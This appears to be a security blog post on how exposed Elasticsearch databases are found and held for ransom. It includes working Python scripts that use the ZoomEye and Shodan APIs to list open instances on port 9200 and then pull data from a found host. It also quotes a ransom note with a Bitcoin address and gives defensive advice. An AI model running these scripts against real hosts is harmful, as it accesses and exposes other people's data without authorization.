Cybercriminals often exploit open databases that are accessible via the internet. These databases, when improperly secured, can be a gold mine for malicious actors. By using search engines like ZoomEye, attackers can programmaticallylocate databases left open to the public and use this access for harmful purposes, such as encrypting the data to demand ransom.
How ZoomEye is Queried Programmatically to find open Elastic Databases
ZoomEye is a search engine for discovering components of the internet, which includes devices, servers, and databases. Below is a Python script that demonstrates how one might programmatically search ZoomEye for Elasticsearch databases that have recently been opened to the internet:
import requests
from datetime import datetime, timedelta
def search_zoomeye():
date_7_days_ago = (datetime.now() - timedelta(days=7)).strftime('%Y-%m-%d')
url = "https://api.zoomeye.hk/host/search"
query = f'app:"elasticsearch" -401 +port:9200 +after:{date_7_days_ago}'
headers = {
"API-KEY": "<your-api-key>",
"User-Agent": "<your-user-agent>"
}
page = 1
results_per_page = 10
with open('ip_elastic.txt', 'w') as file:
while True:
params = {
"query": query,
"page": page,
"facets": "app,os"
}
print(f"Fetching page {page}...")
response = requests.get(url, headers=headers, params=params)
if response.status_code == 200:
data = response.json()
for match in data['matches']:
file.write(match['ip'] + 'n')
print(f"Page {page} processed. IPs written to ip_elastic.txt.")
if page * results_per_page >= data['total']:
break
page += 1
else:
print(f"Failed to fetch data: HTTP {response.status_code}")
break
print("Finished fetching IP addresses.")
if __name__ == "__main__":
search_zoomeye()How Shodan is Queried Programmatically to find open Elastic Databases
The script uses Shodan to find open Elasticsearch instances, converts their IP addresses from integer to standard dot notation, and then checks each instance for sensitive data. It examines the content of Elasticsearch indices for sensitive keywords and patterns (like email addresses), indicating personal or confidential data. Identified data is stored locally in structured directories based on the type of information found, either related to personal email accounts or other sensitive details.
import requests
import json
import re
import socket
from struct import pack
def int_to_ip(int_ip):
return socket.inet_ntoa(pack("!I", int_ip))
def simple_search(host):
url = f"http://{host}:9200/_search?pretty"
try:
response = requests.get(url, timeout=5)
if response.status_code == 200 and 'application/json' in response.headers.get('Content-Type', ''):
print("Data fetched successfully.")
data = response.json()
print(json.dumps(data, indent=2))
else:
print("Failed to fetch data or wrong content type.")
except Exception as e:
print(f"Error querying Elasticsearch on {host}: {e}")
def fetch_data_from_shodan():
print("Connecting to Shodan")
api_key = "YourShodanAPIKey"
url = f"https://api.shodan.io/shodan/host/search?key={api_key}&query=product:elastic%20port:9200%20http:200"
response = requests.get(url)
if response.status_code == 200:
data = response.json()
matches = data.get('matches', [])
if matches:
ip_address = int_to_ip(matches[0]['ip'])
print(f"Analyzing Elasticsearch instance at {ip_address}...")
simple_search(ip_address)
else:
print("No matches found.")
else:
print("Failed to connect to Shodan API")
if __name__ == "__main__":
fetch_data_from_shodan()The Rapid Exploitation of Open Databases and Its Implications for Security: Automated Attacks and the Reality of Ransom Notes in Open Databases
In recent explorations using scripts designed to interact with open Elasticsearch and MongoDB databases via Shodan and direct IP queries, a significant discovery was made: the majority of these databases did not contain expected user or operational data but were instead filled with ransom notes. These notes typically demanded payment in Bitcoin to recover the allegedly stolen data, suggesting a widespread and systematic exploitation of poorly secured databases. An example of such a ransom note reads:
"All your data is backed up. You must pay 0.0060 BTC to 1tpwVPxbRNtQuzKonhzdEsJL8n562uwAr. In 48 hours, your data will be publicly disclosed and deleted. For more information, go to [specific URL]. After paying, send mail to us at [specific email] and we will provide a link for you to download your data. Your DBCODE is: 1ZO14A."
This finding highlights a grim reality in the cybersecurity landscape: cybercriminals are leveraging automated tools to scan for and exploit unprotected databases. Once access is gained, these databases are often encrypted or wiped clean, replaced with a ransom demand. The efficiency and speed of these attacks indicate that new, unprotected databases can be compromised shortly after becoming accessible online.
Implications for Security
1. Speed of Exploitation: The automation of such attacks means that vulnerabilities can be exploited almost as soon as they are exposed. This leaves a very narrow window for administrators to secure their systems.
2. Need for Proactive Security Measures: It’s no longer sufficient to react to security incidents as they occur. Proactive measures, including continuous monitoring and the implementation of robust security policies, are essential.
3. Education and Awareness: Educating system administrators and developers about the importance of database security, from the moment of deployment, is critical. This includes the use of firewalls, strong authentication mechanisms, and ensuring that databases are not exposed to the internet without necessary protections.
The Cost of Ransomware
The demand noted in the example above asks for 0.0060 BTC. With the fluctuating nature of Bitcoin’s value, this amount can represent a substantial sum. For instance, if Bitcoin’s value is approximately $30,000 USD per Bitcoin, the ransom of 0.0060 BTC equates to around $180 USD. This amount, while not exorbitant, can add up across multiple attacks, contributing to a lucrative criminal enterprise. Moreover, the actual cost to organizations is often much higher, factoring in downtime, loss of data, potential breach of customer information, and damage to reputation.